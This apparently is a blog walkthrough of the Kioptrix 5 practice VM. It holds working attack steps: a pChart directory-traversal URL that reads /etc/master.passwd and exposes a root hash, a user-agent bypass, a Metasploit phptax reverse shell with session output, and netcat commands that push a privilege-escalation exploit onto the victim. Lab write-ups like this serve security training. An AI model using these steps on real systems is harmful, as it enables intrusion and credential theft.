Kioptrix 5 walkthrough

root@kali:~# netdiscover -r 192.168.31.0/24

Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
—————————————————————————–
192.168.31.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.31.2 00:50:56:e1:a9:71 1 60 VMware, Inc.
192.168.31.146 00:50:56:20:56:e2 1 60 VMware, Inc.
192.168.31.254 00:50:56:f8:bd:9c 1 60 VMware, Inc.

Scanning:

nmap -sT -sV -A -p- 192.168.31.146 -n –open

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-26 09:05 EST
Nmap scan report for 192.168.31.146
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:50:56:20:56:E2 (VMware)
Device type: general purpose|specialized
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (93%),
Aggressive OS guesses: FreeBSD 9.0-RELEASE – 10.3-RELEASE (93%), AVtech Room Alert 26W environmental monitor (91%), Linux 2.6.18 – 2.6.22 (90%), FreeBSD 7.0-RELEASE – 9.0-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

PHP version & Apache are not useful because I am too lazy to try all or found exploits.

mod_ssl/2.2.21 related exploits also do not seem to work because there is no HTTPS on the server and the found exploits (Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuck.c’ Remote Exploit) will not work because they need SSL.

dirb also finds nothing.

I browse to http://192.168.31.146:80 and I view source. Bingo!

<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=pChart2.1.3/index.php”>

searchsploit to the rescue:

 

 

# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:”pChart 2.x – examples” intext:”2.1.3″
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[1] Directory Traversal:
“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

We try different directory traversal customized URL, but they don’t work because I treat the host like a Linux system…and it is a FreeBSD one, so file locations are different.

/etc/passwd does not exist. Instead we have:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/master.passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root:

I fail to see that the root user actually has the password encrypted and I move along, searching for the equivalent of /etc/shadow, which is /etc/spwd.db, which does not load into the browser when I access:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/spwd.db%22

Google searching finds me:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

Which means that if switch the HTTP user agent to Mozilla4, I might get a different webpage.

root@kali:~# curl -H “User-Agent:Mozilla/4.0” http://192.168.31.146:8080/phptax/ | head -n1

<title>PHPTAX by William L. Berggren 2003(c)</title> 100 4125 0 4125 0 0 2014k 0 –:–:– –:–:– –:–:– 2014k curl: (23) Failed writing body (4067 != 4230) root@kali:~#

root@kali:~# searchsploit phptax
---------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
---------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection (Met | php/webapps/21833.rb
use exploit/multi/http/phptax_exec
set RHOST 192.168.31.146
set RPORT 8080

msf exploit(multi/http/phptax_exec) > run

[*] Started reverse TCP double handler on 192.168.31.139:4444
[*] 192.168.31.1468080 – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo bPVG3SBi0VbyjPza;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo RHWVYqnt2WyVvZsH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “bPVG3SBi0VbyjPza\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “RHWVYqnt2WyVvZsH\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 5 opened (192.168.31.139:4444 -> 192.168.31.146:47858) at 2018-02-26 17:22:01 -0500
[*] Command shell session 6 opened (192.168.31.139:4444 -> 192.168.31.146:56244) at 2018-02-26 17:22:01 -0500

id
uid=80(www) gid=80(www) groups=80(www)

We have limited shell.

uname -a reminds us that we are running FreeBSD 9.

We copy the exploit:

cp /usr/share/exploitdb/platforms/freebsd/local/28718.c ./

Upload it to the victim machine with nc:

nc -lvvp 8888 < ./28718.c   // sending from the attacking machine

nc -nv 8888 > ./28718.c  // receiving on the victim machine

chmod 777 ./28718.c

We compile and run the exploit:

Congratz to myself. I still feel like a noob.

 

Leave a Reply

Your email address will not be published.